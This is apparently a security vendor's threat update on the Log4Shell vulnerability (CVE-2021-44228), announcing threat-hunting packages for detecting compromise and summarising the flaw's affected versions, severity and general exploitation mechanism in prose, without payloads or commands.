Log4Shell Threat Update – 2 Jan 2022
Cyborg Security has published an additional three Hunt Packages related to CVE-2021-44228 (Log4Shell), with the intent to provide more robust coverage based on new attack techniques and usage of the exploit. Reports have indicated that the exploit can be used for a variety of end goals, such as a method to laterally move once an initial system has been compromised as displayed by the Conti Ransomware, or as a method to “worm” through an environment as displayed by the Mirai botnet. Because of these new tactics, process execution anomalies are likely the best course of action to hunt and identify potential infections, not necessarily the initial exploit/attack.
One of the three additional packages (Suspicious Child Process for Java – Potential CVE-2021-44228 Exploitation (Log4Shell)) published this week provides logic to identify child processes, which should be uncommon in normal operations, that are consistent with attacks in the wild and research performed by Cyborg Security Analysts. This package will help analysts and threat hunters identify a potentially compromised host, regardless of whether it was the initially compromised server or compromised via lateral movement. The other two packages (Known Java SPI Port Usage Related to CVE-2021-44228 (Log4Shell) & Unusual Java Port Usage – Potential CVE-2021-44228 (Log4Shell)) relate to Java processes reaching out to non RFC1918 (non-internal) IP space over known Log4Shell and non-standard ports. These two packages can help analysts and threat hunters identify the initially compromised device, or an opportunistically compromised device reaching out to the Internet for payload download and execution. It is recommended to review the “Deployment Requirements” for each package and logic utilized, for information noted during research and development and to help utilize the provided logic as best as possible. As always, all of the packages include details of how to identify, analyze, and respond to the applicable threat as well as references, metadata and other useful information to best arm analysts to properly defend your enterprise.
Log4Shell Threat Update – 12 Dec 2021
Log4Shell (CVE-2021-44228) or the remote code execution vulnerability in the Apache Log4j2 framework was observed in December 2021. The vulnerability was first discovered by Chen Zhaojun of Alibaba Cloud Security. Log4j 2 is an open source third party Java logging library, which is typically utilized to log error messages and utilized by a large number of applications – due to the widespread usage of Java with companies and online services, an increase in exploitation of this vulnerability (if ignored) is expected. Cybersecurity firms have confirmed mass scanning of affected applications in the wild for the vulnerability.
The severity of Log4Shell was scored a 10 by the CVSS rating system, and versions that are effected start from 2.0-beta9 to 2.14.1. It has been observed to allow an attacker to exploit and gain the ability to execute arbitrary code on a vulnerable system and even potentially take control of the system. This is done by attackers forcing the target application to write one string to the log, and subsequently are able to upload their own code due to the “message lookup substitution” function. An example of the ease of exploitation, attackers were able to gain RCE on Minecraft Servers just by pasting a specially crafted message into the game’s chatbox.